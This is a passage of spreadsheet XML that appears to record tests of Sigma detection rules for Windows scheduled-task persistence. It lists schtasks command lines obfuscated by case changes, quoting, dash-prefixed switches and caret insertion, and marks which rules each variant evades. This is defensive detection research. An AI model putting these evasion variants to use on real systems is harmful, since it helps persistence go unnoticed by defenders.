        </is>
      </c>
      <c r="E87" s="44" t="inlineStr">
        <is>
          <t>schtasks.exe /"Create" /"TN" EvilTask /TR "C:\Windows\System32\calc.exe" /SC WEEKLY /d MON /"ST" 08:00</t>
        </is>
      </c>
      <c r="F87" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G87" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H87" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I87" s="43" t="n"/>
      <c r="J87" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K87" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="88" ht="15.75" customHeight="1" s="42">
      <c r="A88" s="44" t="inlineStr">
        <is>
          <t>t1053.005</t>
        </is>
      </c>
      <c r="B88" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_powersploit_empire_default_schtasks</t>
        </is>
      </c>
      <c r="C88" s="44" t="inlineStr">
        <is>
          <t>HackTool - Default PowerSploit/Empire Scheduled Task Creation</t>
        </is>
      </c>
      <c r="D88" s="44" t="inlineStr">
        <is>
          <t>56c217c3-2de2-479b-990f-5c109ba8458f</t>
        </is>
      </c>
      <c r="E88" s="44" t="inlineStr">
        <is>
          <t>schtasks.exe -"Create" -"TN" EvilTask /tR "C:\Windows\System32\calc.exe" -"SC" WEEKLY /D MON /st 08:00</t>
        </is>
      </c>
      <c r="F88" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G88" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H88" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I88" s="43" t="n"/>
      <c r="J88" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K88" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="89" ht="15.75" customHeight="1" s="42">
      <c r="A89" s="44" t="inlineStr">
        <is>
          <t>t1053.005</t>
        </is>
      </c>
      <c r="B89" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_powersploit_empire_default_schtasks</t>
        </is>
      </c>
      <c r="C89" s="44" t="inlineStr">
        <is>
          <t>HackTool - Default PowerSploit/Empire Scheduled Task Creation</t>
        </is>
      </c>
      <c r="D89" s="44" t="inlineStr">
        <is>
          <t>56c217c3-2de2-479b-990f-5c109ba8458f</t>
        </is>
      </c>
      <c r="E89" s="44" t="inlineStr">
        <is>
          <t>schtasks.exe /CREaTe /TN EvilTask -"TR" "C:\Windows\System32\calc.exe" /"SC" WEEKLY -"D" MON /ST 08:00</t>
        </is>
      </c>
      <c r="F89" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G89" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H89" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I89" s="44" t="inlineStr">
        <is>
          <t>Scheduled Task Creation Via Schtasks.EXE (92626ddd-662c-49e3-ac59-f6535f12d189)</t>
        </is>
      </c>
      <c r="J89" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K89" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="90" ht="15.75" customHeight="1" s="42">
      <c r="A90" s="44" t="inlineStr">
        <is>
          <t>t1053.005</t>
        </is>
      </c>
      <c r="B90" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_powersploit_empire_default_schtasks</t>
        </is>
      </c>
      <c r="C90" s="44" t="inlineStr">
        <is>
          <t>HackTool - Default PowerSploit/Empire Scheduled Task Creation</t>
        </is>
      </c>
      <c r="D90" s="44" t="inlineStr">
        <is>
          <t>56c217c3-2de2-479b-990f-5c109ba8458f</t>
        </is>
      </c>
      <c r="E90" s="44" t="inlineStr">
        <is>
          <t>schtasks.exe /"Create" /tN EvilTask -"TR" "C:\Windows\System32\calc.exe" -"SC" WEEKLY /D MON -"ST" 08:00</t>
        </is>
      </c>
      <c r="F90" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G90" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H90" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I90" s="43" t="n"/>
      <c r="J90" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K90" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="91" ht="15.75" customHeight="1" s="42">
      <c r="A91" s="44" t="inlineStr">
        <is>
          <t>t1053.005</t>
        </is>
      </c>
      <c r="B91" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_powersploit_empire_default_schtasks</t>
        </is>
      </c>
      <c r="C91" s="44" t="inlineStr">
        <is>
          <t>HackTool - Default PowerSploit/Empire Scheduled Task Creation</t>
        </is>
      </c>
      <c r="D91" s="44" t="inlineStr">
        <is>
          <t>56c217c3-2de2-479b-990f-5c109ba8458f</t>
        </is>
      </c>
      <c r="E91" s="44" t="inlineStr">
        <is>
          <t>schtasks.exe /crEaTE /"TN" EvilTask /TR "C:\Windows\System32\calc.exe" -"SC" WEEKLY /D MON /"ST" 08:00</t>
        </is>
      </c>
      <c r="F91" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G91" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H91" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I91" s="44" t="inlineStr">
        <is>
          <t>Scheduled Task Creation Via Schtasks.EXE (92626ddd-662c-49e3-ac59-f6535f12d189)</t>
        </is>
      </c>
      <c r="J91" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K91" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="92" ht="15.75" customHeight="1" s="42">
      <c r="A92" s="44" t="inlineStr">
        <is>
          <t>t1053.005</t>
        </is>
      </c>
      <c r="B92" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_powersploit_empire_default_schtasks</t>
        </is>
      </c>
      <c r="C92" s="44" t="inlineStr">
        <is>
          <t>HackTool - Default PowerSploit/Empire Scheduled Task Creation</t>
        </is>
      </c>
      <c r="D92" s="44" t="inlineStr">
        <is>
          <t>56c217c3-2de2-479b-990f-5c109ba8458f</t>
        </is>
      </c>
      <c r="E92" s="44" t="inlineStr">
        <is>
          <t>schtasks.exe /"Create" -"TN" EvilTask /tR "C:\Windows\System32\calc.exe" /SC WEEKLY /D MON /st 08:00</t>
        </is>
      </c>
      <c r="F92" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G92" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H92" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I92" s="43" t="n"/>
      <c r="J92" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K92" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="93" ht="15.75" customHeight="1" s="42">
      <c r="A93" s="44" t="inlineStr">
        <is>
          <t>t1053.005</t>
        </is>
      </c>
      <c r="B93" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_powersploit_empire_default_schtasks</t>
        </is>
      </c>
      <c r="C93" s="44" t="inlineStr">
        <is>
          <t>HackTool - Default PowerSploit/Empire Scheduled Task Creation</t>
        </is>
      </c>
      <c r="D93" s="44" t="inlineStr">
        <is>
          <t>56c217c3-2de2-479b-990f-5c109ba8458f</t>
        </is>
      </c>
      <c r="E93" s="44" t="inlineStr">
        <is>
          <t>schtasks.exe /Create /TN "WinUpdateTask" /TR "powershell -NoProfile -NonInteractive -WindowStyle Hidden -Command \"Write-Host 'Test'\"" /SC ONLOGON</t>
        </is>
      </c>
      <c r="F93" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G93" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H93" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I93" s="44" t="inlineStr">
        <is>
          <t>Scheduled Task Creation Via Schtasks.EXE (92626ddd-662c-49e3-ac59-f6535f12d189)</t>
        </is>
      </c>
      <c r="J93" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K93" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="94" ht="15.75" customHeight="1" s="42">
      <c r="A94" s="44" t="inlineStr">
        <is>
          <t>t1053.005</t>
        </is>
      </c>
      <c r="B94" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_powersploit_empire_default_schtasks</t>
        </is>
      </c>
      <c r="C94" s="44" t="inlineStr">
        <is>
          <t>HackTool - Default PowerSploit/Empire Scheduled Task Creation</t>
        </is>
      </c>
      <c r="D94" s="44" t="inlineStr">
        <is>
          <t>56c217c3-2de2-479b-990f-5c109ba8458f</t>
        </is>
      </c>
      <c r="E94" s="44" t="inlineStr">
        <is>
          <t>schtasks.exe -"Create" /TN "WinUpdateTask" /TR "powershell -NoPrOfilE -NoNintEracTIVe /"WindowStyle" Hidden -c \" Write-Host 'Test' \"" /SC ONLOGON</t>
        </is>
      </c>
      <c r="F94" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G94" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H94" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I94" s="43" t="n"/>
      <c r="J94" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K94" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="95" ht="15.75" customHeight="1" s="42">
      <c r="A95" s="44" t="inlineStr">
        <is>
          <t>t1053.005</t>
        </is>
      </c>
      <c r="B95" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_powersploit_empire_default_schtasks</t>
        </is>
      </c>
      <c r="C95" s="44" t="inlineStr">
        <is>
          <t>HackTool - Default PowerSploit/Empire Scheduled Task Creation</t>
        </is>
      </c>
      <c r="D95" s="44" t="inlineStr">
        <is>
          <t>56c217c3-2de2-479b-990f-5c109ba8458f</t>
        </is>
      </c>
      <c r="E95" s="44" t="inlineStr">
        <is>
          <t>schtasks.exe /"Create" /tn "WinUpdateTask" /tr "powershell -nop -nONInTERaCTIvE -ws Hidden -c \" Write-Host 'Test' \"" /SC ONLOGON</t>
        </is>
      </c>
      <c r="F95" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G95" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H95" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I95" s="43" t="n"/>
      <c r="J95" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K95" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="96" ht="15.75" customHeight="1" s="42">
      <c r="A96" s="44" t="inlineStr">
        <is>
          <t>t1053.005</t>
        </is>
      </c>
      <c r="B96" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_powersploit_empire_default_schtasks</t>
        </is>
      </c>
      <c r="C96" s="44" t="inlineStr">
        <is>
          <t>HackTool - Default PowerSploit/Empire Scheduled Task Creation</t>
        </is>
      </c>
      <c r="D96" s="44" t="inlineStr">
        <is>
          <t>56c217c3-2de2-479b-990f-5c109ba8458f</t>
        </is>
      </c>
      <c r="E96" s="44" t="inlineStr">
        <is>
          <t>schtasks.exe -"Create" -"TN" "WinUpdateTask" -"TR" "powershell /"NoProfile" -NonInteractive /"WindowStyle" Hidden -c \" Write-Host 'Test' \"" /sc ONLOGON</t>
        </is>
      </c>
      <c r="F96" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G96" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H96" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I96" s="43" t="n"/>
      <c r="J96" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K96" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="97" ht="15.75" customHeight="1" s="42">
      <c r="A97" s="44" t="inlineStr">
        <is>
          <t>t1053.005</t>
        </is>
      </c>
      <c r="B97" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_powersploit_empire_default_schtasks</t>
        </is>
      </c>
      <c r="C97" s="44" t="inlineStr">
        <is>
          <t>HackTool - Default PowerSploit/Empire Scheduled Task Creation</t>
        </is>
      </c>
      <c r="D97" s="44" t="inlineStr">
        <is>
          <t>56c217c3-2de2-479b-990f-5c109ba8458f</t>
        </is>
      </c>
      <c r="E97" s="44" t="inlineStr">
        <is>
          <t>schtasks.exe -"Create" /"TN" "WinUpdateTask" /TR "powershell /"NoProfile" -"NonInteractive" -ws Hidden /"Command" \" Write-Host 'Test' \"" /SC ONLOGON</t>
        </is>
      </c>
      <c r="F97" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G97" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H97" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I97" s="43" t="n"/>
      <c r="J97" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K97" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="98" ht="15.75" customHeight="1" s="42">
      <c r="A98" s="44" t="inlineStr">
        <is>
          <t>t1053.005</t>
        </is>
      </c>
      <c r="B98" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_powersploit_empire_default_schtasks</t>
        </is>
      </c>
      <c r="C98" s="44" t="inlineStr">
        <is>
          <t>HackTool - Default PowerSploit/Empire Scheduled Task Creation</t>
        </is>
      </c>
      <c r="D98" s="44" t="inlineStr">
        <is>
          <t>56c217c3-2de2-479b-990f-5c109ba8458f</t>
        </is>
      </c>
      <c r="E98" s="44" t="inlineStr">
        <is>
          <t>schtasks.exe /CREaTe /tn "WinUpdateTask" /tr "powershell /"NoProfile" -NONInTERactIVE -wiNdOwStYLe Hidden -c \" Write-Host 'Test' \"" /Sc ONLOGON</t>
        </is>
      </c>
      <c r="F98" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G98" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H98" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I98" s="44" t="inlineStr">
        <is>
          <t>Scheduled Task Creation Via Schtasks.EXE (92626ddd-662c-49e3-ac59-f6535f12d189)</t>
        </is>
      </c>
      <c r="J98" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K98" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="99" ht="15.75" customHeight="1" s="42">
      <c r="A99" s="44" t="inlineStr">
        <is>
          <t>t1053.005</t>
        </is>
      </c>
      <c r="B99" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_powersploit_empire_default_schtasks</t>
        </is>
      </c>
      <c r="C99" s="44" t="inlineStr">
        <is>
          <t>HackTool - Default PowerSploit/Empire Scheduled Task Creation</t>
        </is>
      </c>
      <c r="D99" s="44" t="inlineStr">
        <is>
          <t>56c217c3-2de2-479b-990f-5c109ba8458f</t>
        </is>
      </c>
      <c r="E99" s="44" t="inlineStr">
        <is>
          <t>schtasks.exe /Create /TN "WinUpdateTask" /"TR" "powershell /"NoProfile" -NonInteractive /"WindowStyle" Hidden -CommAND \" Write-Host 'Test' \"" /SC ONLOGON</t>
        </is>
      </c>
      <c r="F99" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G99" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H99" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I99" s="44" t="inlineStr">
        <is>
          <t>Scheduled Task Creation Via Schtasks.EXE (92626ddd-662c-49e3-ac59-f6535f12d189)</t>
        </is>
      </c>
      <c r="J99" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K99" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="100" ht="15.75" customHeight="1" s="42">
      <c r="A100" s="44" t="inlineStr">
        <is>
          <t>t1053.005</t>
        </is>
      </c>
      <c r="B100" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_powersploit_empire_default_schtasks</t>
        </is>
      </c>
      <c r="C100" s="44" t="inlineStr">
        <is>
          <t>HackTool - Default PowerSploit/Empire Scheduled Task Creation</t>
        </is>
      </c>
      <c r="D100" s="44" t="inlineStr">
        <is>
          <t>56c217c3-2de2-479b-990f-5c109ba8458f</t>
        </is>
      </c>
      <c r="E100" s="44" t="inlineStr">
        <is>
          <t>schtasks.exe /Create /TN "WinUpdateTask" /"TR" "powershell -"NoProfile" /"NonInteractive" -ws Hidden /"Command" \" Write-Host 'Test' \"" /sc ONLOGON</t>
        </is>
      </c>
      <c r="F100" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G100" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H100" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I100" s="44" t="inlineStr">
        <is>
          <t>Scheduled Task Creation Via Schtasks.EXE (92626ddd-662c-49e3-ac59-f6535f12d189)</t>
        </is>
      </c>
      <c r="J100" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K100" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="101" ht="15.75" customHeight="1" s="42">
      <c r="A101" s="44" t="inlineStr">
        <is>
          <t>t1053.005</t>
        </is>
      </c>
      <c r="B101" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_powersploit_empire_default_schtasks</t>
        </is>
      </c>
      <c r="C101" s="44" t="inlineStr">
        <is>
          <t>HackTool - Default PowerSploit/Empire Scheduled Task Creation</t>
        </is>
      </c>
      <c r="D101" s="44" t="inlineStr">
        <is>
          <t>56c217c3-2de2-479b-990f-5c109ba8458f</t>
        </is>
      </c>
      <c r="E101" s="44" t="inlineStr">
        <is>
          <t>schtasks.exe /CrEATe -"TN" "WinUpdateTask" /TR "powershell -nop -noNInteractIVE -ws Hidden -c \" Write-Host 'Test' \"" /SC ONLOGON</t>
        </is>
      </c>
      <c r="F101" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G101" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H101" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I101" s="44" t="inlineStr">
        <is>
          <t>Scheduled Task Creation Via Schtasks.EXE (92626ddd-662c-49e3-ac59-f6535f12d189)</t>
        </is>
      </c>
      <c r="J101" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K101" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="102" ht="15.75" customHeight="1" s="42">
      <c r="A102" s="44" t="inlineStr">
        <is>
          <t>t1053.005</t>
        </is>
      </c>
      <c r="B102" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_powersploit_empire_default_schtasks</t>
        </is>
      </c>
      <c r="C102" s="44" t="inlineStr">
        <is>
          <t>HackTool - Default PowerSploit/Empire Scheduled Task Creation</t>
        </is>
      </c>
      <c r="D102" s="44" t="inlineStr">
        <is>
          <t>56c217c3-2de2-479b-990f-5c109ba8458f</t>
        </is>
      </c>
      <c r="E102" s="44" t="inlineStr">
        <is>
          <t>schtasks.exe /CREAtE /TN "WinUpdateTask" -"TR" "powershell -nOPrOfile -NonInteractive -WInDOWStYlE Hidden -COMMANd \" Write-Host 'Test' \"" /SC ONLOGON</t>
        </is>
      </c>
      <c r="F102" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G102" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H102" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I102" s="44" t="inlineStr">
        <is>
          <t>Scheduled Task Creation Via Schtasks.EXE (92626ddd-662c-49e3-ac59-f6535f12d189)</t>
        </is>
      </c>
      <c r="J102" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K102" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="103" ht="15.75" customHeight="1" s="42">
      <c r="A103" s="44" t="inlineStr">
        <is>
          <t>t1053.005</t>
        </is>
      </c>
      <c r="B103" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_powersploit_empire_default_schtasks</t>
        </is>
      </c>
      <c r="C103" s="44" t="inlineStr">
        <is>
          <t>HackTool - Default PowerSploit/Empire Scheduled Task Creation</t>
        </is>
      </c>
      <c r="D103" s="44" t="inlineStr">
        <is>
          <t>56c217c3-2de2-479b-990f-5c109ba8458f</t>
        </is>
      </c>
      <c r="E103" s="44" t="inlineStr">
        <is>
          <t>schtasks.exe /"Create" -"TN" "WinUpdateTask" /"TR" "powershell -NoPROfIlE /"NonInteractive" /"WindowStyle" Hidden -"Command" \" Write-Host 'Test' \"" -"SC" ONLOGON</t>
        </is>
      </c>
      <c r="F103" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G103" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H103" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I103" s="43" t="n"/>
      <c r="J103" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K103" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="104" ht="15.75" customHeight="1" s="42">
      <c r="A104" s="43" t="inlineStr">
        <is>
          <t>t1053.005</t>
        </is>
      </c>
      <c r="B104" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_schtasks_creation</t>
        </is>
      </c>
      <c r="C104" s="44" t="inlineStr">
        <is>
          <t>Scheduled Task Creation Via Schtasks.EXE</t>
        </is>
      </c>
      <c r="D104" s="44" t="inlineStr">
        <is>
          <t>92626ddd-662c-49e3-ac59-f6535f12d189</t>
        </is>
      </c>
      <c r="E104" s="44" t="inlineStr">
        <is>
          <t>schtasks.exe -create /tn "T1053_005_OnLogon" /sc onlogon /tr "cmd.exe /c calc.exe"</t>
        </is>
      </c>
      <c r="F104" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G104" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H104" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I104" s="44" t="inlineStr">
        <is>
          <t>Suspicious Schtasks Schedule Types (24c8392b-aa3c-46b7-a545-43f71657fe98)</t>
        </is>
      </c>
      <c r="J104" s="44" t="n">
        <v>2</v>
      </c>
      <c r="K104" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="105" ht="15.75" customHeight="1" s="42">
      <c r="A105" s="43" t="inlineStr">
        <is>
          <t>t1053.005</t>
        </is>
      </c>
      <c r="B105" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_schtasks_creation</t>
        </is>
      </c>
      <c r="C105" s="44" t="inlineStr">
        <is>
          <t>Scheduled Task Creation Via Schtasks.EXE</t>
        </is>
      </c>
      <c r="D105" s="44" t="inlineStr">
        <is>
          <t>92626ddd-662c-49e3-ac59-f6535f12d189</t>
        </is>
      </c>
      <c r="E105" s="44" t="inlineStr">
        <is>
          <t>schtasks.exe "/create" /tn "T1053_005_OnLogon" /sc onlogon /tr "cmd.exe /c calc.exe"</t>
        </is>
      </c>
      <c r="F105" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G105" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H105" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I105" s="44" t="inlineStr">
        <is>
          <t>Suspicious Schtasks Schedule Types (24c8392b-aa3c-46b7-a545-43f71657fe98)</t>
        </is>
      </c>
      <c r="J105" s="44" t="n">
        <v>2</v>
      </c>
      <c r="K105" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="106" ht="15.75" customHeight="1" s="42">
      <c r="A106" s="43" t="inlineStr">
        <is>
          <t>t1053.005</t>
        </is>
      </c>
      <c r="B106" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_schtasks_creation</t>
        </is>
      </c>
      <c r="C106" s="44" t="inlineStr">
        <is>
          <t>Scheduled Task Creation Via Schtasks.EXE</t>
        </is>
      </c>
      <c r="D106" s="44" t="inlineStr">
        <is>
          <t>92626ddd-662c-49e3-ac59-f6535f12d189</t>
        </is>
      </c>
      <c r="E106" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /c schtasks.exe /cr^eate /tn "T1053_005_OnLogon" /sc onlogon /tr "cmd.exe /c calc.exe"</t>
        </is>
      </c>
      <c r="F106" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G106" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H106" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I106" s="44" t="inlineStr">
        <is>
          <t>Suspicious Schtasks Schedule Types (24c8392b-aa3c-46b7-a545-43f71657fe98); Scheduled Task Creation Via Schtasks.EXE (92626ddd-662c-49e3-ac59-f6535f12d189)</t>
        </is>
      </c>
      <c r="J106" s="44" t="n">
        <v>2</v>
      </c>
      <c r="K106" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="107" ht="15.75" customHeight="1" s="42">
      <c r="A107" s="43" t="n"/>
      <c r="B107" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_schtasks_one_time_only_midnight_task</t>
        </is>
      </c>
      <c r="C107" s="44" t="inlineStr">
        <is>
          <t>Uncommon One Time Only Scheduled Task At 00:00</t>
        </is>
      </c>
      <c r="D107" s="44" t="inlineStr">
        <is>
          <t>970823b7-273b-460a-8afc-3a6811998529</t>
        </is>
      </c>
      <c r="E107" s="44" t="inlineStr">
        <is>
          <t>schtasks.exe /Create /SC ONCE /ST 00:00 /TN "UpdateTask" /TR "C:\\Windows\\Temp\\update.exe" /F</t>
        </is>
      </c>
      <c r="F107" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G107" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H107" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I107" s="4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07" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K107" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="108" ht="15.75" customHeight="1" s="42">
      <c r="A108" s="43" t="n"/>
      <c r="B108" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_schtasks_one_time_only_midnight_task</t>
        </is>
      </c>
      <c r="C108" s="44" t="inlineStr">
        <is>
          <t>Uncommon One Time Only Scheduled Task At 00:00</t>
        </is>
      </c>
      <c r="D108" s="44" t="inlineStr">
        <is>
          <t>970823b7-273b-460a-8afc-3a6811998529</t>
        </is>
      </c>
      <c r="E108" s="44" t="inlineStr">
        <is>
          <t>schtasks.exe /"Create" -"SC" ONCE /ST 00:00 /TN "UpdateTask" /tr "C:\\Windows\\Temp\\update.exe" /f</t>
        </is>
      </c>
      <c r="F108" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G108" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H108" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I108" s="44" t="inlineStr">
        <is>
          <t>Suspicious Schtasks Schedule Types (24c8392b-aa3c-46b7-a545-43f71657fe98)</t>
        </is>
      </c>
      <c r="J108" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K108" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="109" ht="15.75" customHeight="1" s="42">
      <c r="A109" s="43" t="n"/>
      <c r="B109" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_schtasks_one_time_only_midnight_task</t>
        </is>
      </c>
      <c r="C109" s="44" t="inlineStr">
        <is>
          <t>Uncommon One Time Only Scheduled Task At 00:00</t>
        </is>
      </c>
      <c r="D109" s="44" t="inlineStr">
        <is>
          <t>970823b7-273b-460a-8afc-3a6811998529</t>
        </is>
      </c>
      <c r="E109" s="44" t="inlineStr">
        <is>
          <t>schtasks.exe /create -"SC" ONCE /St 00:00 -"TN" "UpdateTask" /TR "C:\\Windows\\Temp\\update.exe" /F</t>
        </is>
      </c>
      <c r="F109" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G109" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H109" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I109" s="44" t="inlineStr">
        <is>
          <t>Suspicious Schtasks Schedule Types (24c8392b-aa3c-46b7-a545-43f71657fe98); Scheduled Task Creation Via Schtasks.EXE (92626ddd-662c-49e3-ac59-f6535f12d189)</t>
        </is>
      </c>
      <c r="J109" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K109" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="110" ht="15.75" customHeight="1" s="42">
      <c r="A110" s="43" t="n"/>
      <c r="B110" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_schtasks_one_time_only_midnight_task</t>
        </is>
      </c>
      <c r="C110" s="44" t="inlineStr">
        <is>
          <t>Uncommon One Time Only Scheduled Task At 00:00</t>
        </is>
      </c>
      <c r="D110" s="44" t="inlineStr">
        <is>
          <t>970823b7-273b-460a-8afc-3a6811998529</t>
        </is>
      </c>
      <c r="E110" s="44" t="inlineStr">
        <is>
          <t>schtasks.exe /Create /SC ONCE /ST 00:00 /TN "UpdateTask" /"TR" "C:\\Windows\\Temp\\update.exe" /f</t>
        </is>
      </c>
      <c r="F110" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G110" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H110" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I110" s="4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10" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K110" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="111" ht="15.75" customHeight="1" s="42">
      <c r="A111" s="43" t="n"/>
      <c r="B111" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_schtasks_one_time_only_midnight_task</t>
        </is>
      </c>
      <c r="C111" s="44" t="inlineStr">
        <is>
          <t>Uncommon One Time Only Scheduled Task At 00:00</t>
        </is>
      </c>
      <c r="D111" s="44" t="inlineStr">
        <is>
          <t>970823b7-273b-460a-8afc-3a6811998529</t>
        </is>
      </c>
      <c r="E111" s="44" t="inlineStr">
        <is>
          <t>schtasks.exe /CrEAtE /"SC" ONCE -"ST" 00:00 /Tn "UpdateTask" /TR "C:\\Windows\\Temp\\update.exe" /F</t>
        </is>
      </c>
      <c r="F111" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G111" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H111" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I111" s="44" t="inlineStr">
        <is>
